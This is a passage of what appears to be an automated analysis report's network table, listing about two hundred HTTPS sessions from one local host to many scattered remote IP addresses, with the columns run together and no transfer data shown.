                                                      14510192.168.2.1446770105.74.25.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14511192.168.2.1459048128.109.171.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14512192.168.2.144682436.108.177.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14513192.168.2.14363365.205.223.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14514192.168.2.143650471.171.242.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14515192.168.2.1439550108.121.5.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14516192.168.2.145965479.34.255.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14517192.168.2.1449552134.107.91.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14518192.168.2.1445140173.117.49.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14519192.168.2.1434436178.85.3.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14520192.168.2.144559888.107.92.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14521192.168.2.1459372135.161.208.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14522192.168.2.144951618.230.158.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14523192.168.2.1439716165.227.239.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14524192.168.2.144834297.121.100.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14525192.168.2.1460964156.57.10.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14526192.168.2.1442842204.49.168.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14527192.168.2.1438212144.215.74.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14528192.168.2.143947668.41.209.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14529192.168.2.1433260178.13.201.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14530192.168.2.1445148117.166.64.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14531192.168.2.1458680162.26.219.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14532192.168.2.1459420200.187.170.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14533192.168.2.1441784196.200.34.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14534192.168.2.145264896.253.211.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14535192.168.2.1449308222.38.253.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14536192.168.2.144301662.209.247.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14537192.168.2.1453172159.85.66.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14538192.168.2.145759457.144.255.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14539192.168.2.143308290.134.52.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14540192.168.2.1433100198.183.93.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14541192.168.2.1435304159.245.79.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14542192.168.2.1440868155.183.52.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14543192.168.2.145916486.7.152.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14544192.168.2.146097080.94.71.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14545192.168.2.1433552158.7.1.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14546192.168.2.1436856208.149.22.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14547192.168.2.1452174196.12.205.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14548192.168.2.1456204220.42.120.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14549192.168.2.1457600153.169.219.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14550192.168.2.1450194201.22.17.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14551192.168.2.143841885.17.231.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14552192.168.2.1453338142.117.19.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14553192.168.2.1442002216.116.244.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14554192.168.2.145723083.40.217.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14555192.168.2.145173069.188.218.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14556192.168.2.14409909.146.47.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14557192.168.2.14423864.30.2.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14558192.168.2.145848231.201.230.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14559192.168.2.1447038175.49.72.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14560192.168.2.1456832104.154.25.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14561192.168.2.144978853.3.221.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14562192.168.2.14382729.220.221.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14563192.168.2.1450930107.183.90.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14564192.168.2.1441476158.209.132.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14565192.168.2.1444850186.86.182.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14566192.168.2.143882237.39.120.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14567192.168.2.1445432186.132.108.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14568192.168.2.1458108131.53.186.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14569192.168.2.1456568152.123.84.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14570192.168.2.1436186166.147.183.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14571192.168.2.145314232.94.39.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14572192.168.2.145546094.215.112.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14573192.168.2.144095870.178.162.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14574192.168.2.1456812101.10.228.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14575192.168.2.14520765.101.80.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14576192.168.2.1435888200.122.156.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14577192.168.2.145649859.2.159.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14578192.168.2.1438824139.181.100.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14579192.168.2.1444332181.245.174.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14580192.168.2.1443704128.158.24.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14581192.168.2.145253689.180.6.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14582192.168.2.1445722200.94.88.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14583192.168.2.1443536106.225.232.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14584192.168.2.1434988206.95.149.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14585192.168.2.145374075.173.6.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14586192.168.2.1438380103.253.30.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14587192.168.2.1452964161.150.76.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14588192.168.2.1449564106.158.137.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14589192.168.2.1450154138.10.1.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14590192.168.2.145522057.49.71.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14591192.168.2.1456920154.130.118.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14592192.168.2.1443076198.237.31.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14593192.168.2.1450682104.232.89.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14594192.168.2.1452604185.26.206.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14595192.168.2.1441094106.228.82.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14596192.168.2.1460710192.231.235.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14597192.168.2.144781278.244.97.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14598192.168.2.1455968148.197.187.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14599192.168.2.14489589.51.169.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14600192.168.2.1459150118.52.45.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14601192.168.2.1452024112.59.213.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14602192.168.2.1441330111.44.10.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14603192.168.2.1451130159.25.238.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14604192.168.2.144514678.116.16.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14605192.168.2.1438366145.103.103.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14606192.168.2.144104880.155.244.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14607192.168.2.145476488.199.236.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14608192.168.2.1448892176.140.89.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14609192.168.2.1455578113.241.75.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14610192.168.2.145122023.8.31.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14611192.168.2.143906649.157.188.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14612192.168.2.1443190169.214.33.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14613192.168.2.143875679.224.253.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14614192.168.2.1458944185.203.142.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14615192.168.2.145455082.111.118.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14616192.168.2.1447556209.117.196.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14617192.168.2.1442856114.21.141.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14618192.168.2.1447824106.144.72.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14619192.168.2.144115252.125.151.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14620192.168.2.1435934166.179.82.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14621192.168.2.144372043.128.3.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14622192.168.2.1445126179.114.249.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14623192.168.2.1433164193.201.249.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14624192.168.2.1452384124.228.238.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14625192.168.2.1439416133.144.213.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14626192.168.2.1448074124.119.169.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14627192.168.2.1447254123.237.139.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14628192.168.2.1458192208.247.65.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14629192.168.2.14555808.47.3.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14630192.168.2.1449696122.52.121.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14631192.168.2.1454862196.200.120.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14632192.168.2.144902854.237.145.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14633192.168.2.1436534195.58.239.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14634192.168.2.143368817.229.133.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14635192.168.2.1444844114.130.107.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14636192.168.2.1432768176.123.132.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14637192.168.2.1449740144.233.106.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14638192.168.2.1434080147.218.69.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14639192.168.2.1455418216.166.163.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14640192.168.2.1438386112.57.207.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14641192.168.2.1451318148.187.34.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14642192.168.2.1453404203.42.90.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14643192.168.2.143999463.68.18.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14644192.168.2.1447202183.34.241.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14645192.168.2.1432906119.25.28.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14646192.168.2.143884632.71.246.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14647192.168.2.1435988211.153.52.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14648192.168.2.1456154206.247.198.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14649192.168.2.145043071.113.47.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14650192.168.2.1443080171.115.48.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14651192.168.2.1436026103.119.77.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14652192.168.2.145054870.238.233.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14653192.168.2.1458124216.223.122.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14654192.168.2.143720492.68.182.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14655192.168.2.144287252.167.83.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14656192.168.2.1434050119.151.250.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14657192.168.2.1438042163.191.141.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14658192.168.2.145815473.203.159.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14659192.168.2.1439896133.179.251.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14660192.168.2.1443052141.131.139.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14661192.168.2.144963423.135.83.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14662192.168.2.1433338154.23.65.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14663192.168.2.1452502112.69.2.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14664192.168.2.1452832204.25.98.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14665192.168.2.1459904155.234.212.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14666192.168.2.146098838.240.200.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14667192.168.2.145350270.92.215.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14668192.168.2.146020099.158.205.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14669192.168.2.1452152198.191.13.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14670192.168.2.1437978109.168.251.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14671192.168.2.14381669.89.134.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14672192.168.2.1435298183.197.143.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14673192.168.2.145401018.218.246.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14674192.168.2.143336657.3.228.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14675192.168.2.145541248.146.196.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14676192.168.2.143807013.247.65.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14677192.168.2.1448712186.18.41.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14678192.168.2.1438316178.164.73.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14679192.168.2.1442702158.92.116.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14680192.168.2.1455546189.177.166.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14681192.168.2.1445878100.235.173.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14682192.168.2.1442046124.28.23.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14683192.168.2.143711874.22.53.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14684192.168.2.1456504175.199.75.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14685192.168.2.144455869.108.37.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14686192.168.2.1458842140.234.177.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14687192.168.2.1447252185.3.201.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14688192.168.2.1453816130.120.78.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14689192.168.2.1451556119.109.65.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14690192.168.2.144727693.191.37.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14691192.168.2.1453854201.113.91.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14692192.168.2.145911488.234.104.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14693192.168.2.1459730123.248.137.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14694192.168.2.1435010220.77.88.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14695192.168.2.1457300105.161.139.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14696192.168.2.1433108114.151.234.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14697192.168.2.1458804109.142.47.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14698192.168.2.1441578109.238.234.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14699192.168.2.144472279.57.5.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14700192.168.2.145268098.11.54.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14701192.168.2.1454986186.49.182.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14702192.168.2.1454220144.85.248.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14703192.168.2.145429645.92.190.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14704192.168.2.1459958153.3.33.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14705192.168.2.1451814207.49.242.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14706192.168.2.1451086180.255.240.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14707192.168.2.1449298125.160.190.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14708192.168.2.1446648172.113.94.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14709192.168.2.144824842.248.104.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14710192.168.2.1457464164.101.62.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14711192.168.2.1441224222.236.175.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14712192.168.2.1451002218.199.78.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14713192.168.2.145059453.255.217.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14714192.168.2.1448760155.162.95.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14715192.168.2.144232471.70.159.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14716192.168.2.14440548.245.61.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14717192.168.2.143554053.63.111.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14718192.168.2.1457608178.166.242.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14719192.168.2.144438496.130.28.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14720192.168.2.144239217.34.16.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14721192.168.2.1454818144.7.59.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
